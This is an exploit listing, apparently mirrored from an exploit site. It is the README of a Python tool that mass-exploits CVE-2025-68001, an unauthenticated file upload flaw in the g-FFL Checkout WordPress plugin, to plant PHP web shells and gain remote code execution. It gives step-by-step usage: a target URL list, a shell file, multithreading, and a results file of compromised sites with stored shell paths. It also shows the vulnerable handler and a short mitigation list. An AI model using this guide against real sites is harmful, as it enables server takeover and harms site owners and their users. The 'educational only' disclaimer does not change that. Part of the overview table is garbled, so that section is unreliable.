Exploit for CVE-2025-68001

Name: Exploit for CVE-2025-68001
Rating: 5 (91 reviews)
2026-04-18 | CVSS 9.8
## https://sploitus.com/exploit?id=29E7A24C-53B5-5820-9D6C-B597E8A0BDF6
# CVE-2025-68001
WordPress g-FFL Checkout Plugin &lt;= 2.1.0 is vulnerable to a high priority Arbitrary File Upload


```
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 
```



[![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/KNxploited)
[![CVE](https://img.shields.io/badge/CVE-2025--68001-red?style=for-the-badge&logo=cve&logoColor=white)](https://vulners.com/cve/CVE-2025-68001)
[![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://python.org)
[![License](https://img.shields.io/badge/License-Educational%20Only-yellow?style=for-the-badge)](#-disclaimer)



> 📡 **Stay ahead of the curve.**
> Join **[@KNxploited](https://t.me/KNxploited)** on Telegram — your exclusive source for the latest CVEs, zero-days, and cutting-edge exploit research. Updated constantly. Not for everyone.



---

## 📋 Overview

**CVE-2025-68001** is a critical **Unauthenticated Arbitrary File Upload** vulnerability discovered in the **g-FFL Checkout** WordPress plugin by **garidium**.

The vulnerability allows an unauthenticated remote attacker to upload arbitrary files — including web shells — to the target server via the `ffl_upload_document` AJAX action, leading to **full Remote Code Execution (RCE)**.

| Field              | Details                          |
|--------------------|----------------------------------|
| **CVE ID**         | CVE-2025-68001                   |
| **Plugin**         | g-FFL Checkout (`g-ffl-checkout`)|
| **Affected Versions** | `n/a` through `
      document_type=document
      document=
      ↓
   Server stores the file without extension or MIME validation

3. Parse JSON response
      ↓
   Extract uploaded file path / unique filename

4. Access uploaded shell via HTTP
      ↓
   Remote Code Execution achieved ✔️
```

The plugin exposes an AJAX endpoint `ffl_upload_document` that:
- Accepts file uploads with no authentication check
- Performs no server-side file type validation
- Returns the stored file path in its JSON response

---

## 🔧 Requirements

Install all dependencies before running:

```bash
pip install requests rich
```

| Dependency | Purpose                          |
|------------|----------------------------------|
| `requests` | HTTP requests & session handling |
| `rich`     | Terminal UI, progress bars, panels |
| `threading` | Multi-threaded target processing |

> Python **3.8+** is required.

---

## 📂 File Structure

```
CVE-2025-68001/
├── CVE-2025-68001.py       # Main exploit script
├── shell.php               # Web shell to upload (you provide this)
├── list.txt                # Target URLs (one per line)
└── success_results.txt     # Auto-generated results output
```

---

## 🚀 Usage

### Step 1 — Prepare Your Targets

Create a `list.txt` file with one target URL per line:

```
https://target1.com
https://target2.com
http://target3.com/wordpress
```

> The script automatically prepends `http://` if no scheme is provided.

---

### Step 2 — Prepare Your Shell

Place your PHP web shell in the same directory. Example minimal shell:

```php

```

Save it as `shell.php` (or any name — you'll be prompted to enter it).

---

### Step 3 — Run the Exploit

```bash
python CVE-2025-68001.py
```

You will be prompted interactively:

```
Enter targets file name (default: list.txt):
> list.txt

Enter shell file name to upload (default: shell.php):
> shell.php

Enter number of threads (default: 50):
> 20
```

---

### Step 4 — Review Results

Successful exploits are saved automatically to `success_results.txt`:

```
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php
```

Each line contains:
- Target URL
- Stored file path on server
- Unique filename assigned by server
- Original uploaded filename

---

## 🖥️ Script Parameters Reference

| Prompt                  | Default      | Description                              |
|-------------------------|--------------|------------------------------------------|
| Targets file            | `list.txt`   | File containing target URLs              |
| Shell file              | `shell.php`  | PHP shell to upload to the target        |
| Number of threads       | `50`         | Concurrent workers (max: 50)             |

---

## 📊 Output Example

```
✔  https://victim.com  — /checkout reachable. Trying exploit...

┌─────────────────────────────────────────────────────┐
│                      Success                        │
│  https://victim.com                                 │
│  Original Name:  shell.php                          │
│  Unique Name:    a7f3c1d9e.php                      │
│  Stored Path:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

All targets processed ✔️. Results saved to: success_results.txt
```

---

## 🔍 Vulnerable Code Path (Technical)

The vulnerability resides in the plugin's AJAX handler registered without capability checks:

```php
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce verified from /checkout page (publicly accessible)
    // No MIME type validation
    // No extension whitelist/blacklist
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}
```

---

## 🛡️ Mitigation & Remediation

If you are a **site owner or developer**, take the following steps immediately:

- ✅ **Update** the `g-ffl-checkout` plugin to a patched version (> 2.1.0) if available
- ✅ **Disable** the plugin until a patch is confirmed
- ✅ **Restrict** execution permissions in upload directories (e.g., `.htaccess` rules)
- ✅ **Implement** server-side file type validation and strict extension whitelisting
- ✅ **Monitor** upload directories for suspicious `.php` files
- ✅ **Enable WAF** rules to block unauthenticated AJAX file upload requests

---

## ⚠️ Disclaimer

```
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL AND AUTHORIZED
SECURITY RESEARCH PURPOSES ONLY.

By using this script, you explicitly agree to the following:

  • You have EXPLICIT written permission from the target system owner.
  • You are operating in a controlled lab or authorized penetration testing engagement.
  • You will NOT use this tool against any system you do not own or have legal
    authorization to test.
  • The author (Nxploited) holds ZERO liability for any damage, data loss,
    legal consequences, or misuse resulting from this tool.

Unauthorized use of this tool against systems without permission is ILLEGAL
and may violate laws including but not limited to:
  — Computer Fraud and Abuse Act (CFAA)
  — EU Directive on Attacks Against Information Systems
  — And equivalent laws in your jurisdiction.

USE RESPONSIBLY. HACK ETHICALLY.
```

---

## 👤 Author



| | |
|---|---|
| **Handle** | Nxploited |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |



> 🔔 **Follow [@KNxploited](https://t.me/KNxploited) on Telegram**
> to receive the latest vulnerability disclosures, exploit releases,
> and security research — before anyone else does.



---


  Built with precision by Nxploited · For educational use only